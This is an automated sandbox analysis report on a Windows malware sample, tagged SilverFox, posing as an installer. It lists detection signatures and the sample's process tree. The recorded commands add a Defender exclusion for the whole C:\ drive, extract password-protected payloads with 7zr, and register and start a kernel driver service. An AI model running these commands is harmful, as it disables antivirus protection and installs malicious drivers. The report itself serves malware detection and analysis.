
Windows Analysis Report
#U5b89#U88c5#U52a9#U624b_2.0.5.exe

Overview

General Information

Sample name: #U5b89#U88c5#U52a9#U624b_2.0.5.exe
renamed because original name is a hash value
Original sample name: _2.0.5.exe
Analysis ID: 1579694
MD5: c17bd872bfa6b9e26aa03ad02ceaaca0
SHA1: a2cc5d1e3526ad5b415ba875b12e1e42d48411ce
SHA256: 43a0b8a907d46b77e8695c8c00f90a6812f9bdb138d2ae53c1ce0d9b4362e610
Tags: exe, SilverFox, winos, user-kafan_shengui

Detection

Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to hide a thread from the debugger
Found driver which could be used to inject code into processes
Hides threads from debuggers
Loading BitLocker PowerShell Module
PE file contains section with special chars
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: New Kernel Driver Via SC.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • #U5b89#U88c5#U52a9#U624b_2.0.5.exe (PID: 4060 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe" MD5: C17BD872BFA6B9E26AA03AD02CEAACA0)
    • #U5b89#U88c5#U52a9#U624b_2.0.5.tmp (PID: 3468 cmdline: "C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp" /SL5="$10404,4753080,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe" MD5: 9902FA6D39184B87AED7D94A037912D8)
      • powershell.exe (PID: 2020 cmdline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 2036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 6200 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • #U5b89#U88c5#U52a9#U624b_2.0.5.exe (PID: 1460 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe" /VERYSILENT MD5: C17BD872BFA6B9E26AA03AD02CEAACA0)
        • #U5b89#U88c5#U52a9#U624b_2.0.5.tmp (PID: 5716 cmdline: "C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp" /SL5="$40418,4753080,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe" /VERYSILENT MD5: 9902FA6D39184B87AED7D94A037912D8)
          • 7zr.exe (PID: 3908 cmdline: 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • 7zr.exe (PID: 2912 cmdline: 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 3532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 3908 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cmd.exe (PID: 2632 cmdline: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6820 cmdline: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1088 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6216 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7112 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6840 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6864 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5172 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7084 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2912 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2632 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5224 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5764 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2876 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2760 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3916 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5320 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3908 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 504 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
  • cmd.exe (PID: 2572 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6816 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7096 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4176 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2760 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5224 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6524 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 504 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • conhost.exe (PID: 2276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1708 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2432 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6864 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6816 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4948 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4176 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5916 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2276 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5208 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5648 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2876 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1476 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6908 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4948 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 828 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3704 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6532 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6840 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3604 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1088 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4776 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2940 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6512 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6528 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6216 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 432 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5172 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3820 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 936 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 504 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1408 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6840 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2760 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4948 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5720 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp" /SL5="$10404,4753080,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp, ParentProcessId: 3468, ParentProcessName: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 2020, ProcessName: powershell.exe
Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems); Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2632, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 6820, ProcessName: sc.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp" /SL5="$10404,4753080,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp, ParentProcessId: 3468, ParentProcessName: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 2020, ProcessName: powershell.exe
Source: Process started; Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community; Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2632, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 6820, ProcessName: sc.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp" /SL5="$10404,4753080,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp, ParentProcessId: 3468, ParentProcessName: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 2020, ProcessName: powershell.exe
No Suricata rule has matched
AV Detection

Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exe; Virustotal: Detection: 8%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 95.4% probability
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000D.00000003.2197135796.0000000000E60000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000D.00000003.2197029483.00000000030D0000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.13.dr
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp; Code function: 6_2_6CC0AEC0 FindFirstFileA,FindClose,6_2_6CC0AEC0
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 11_2_00F06868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,11_2_00F06868
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 11_2_00F07496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,11_2_00F07496
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr; String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr; String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
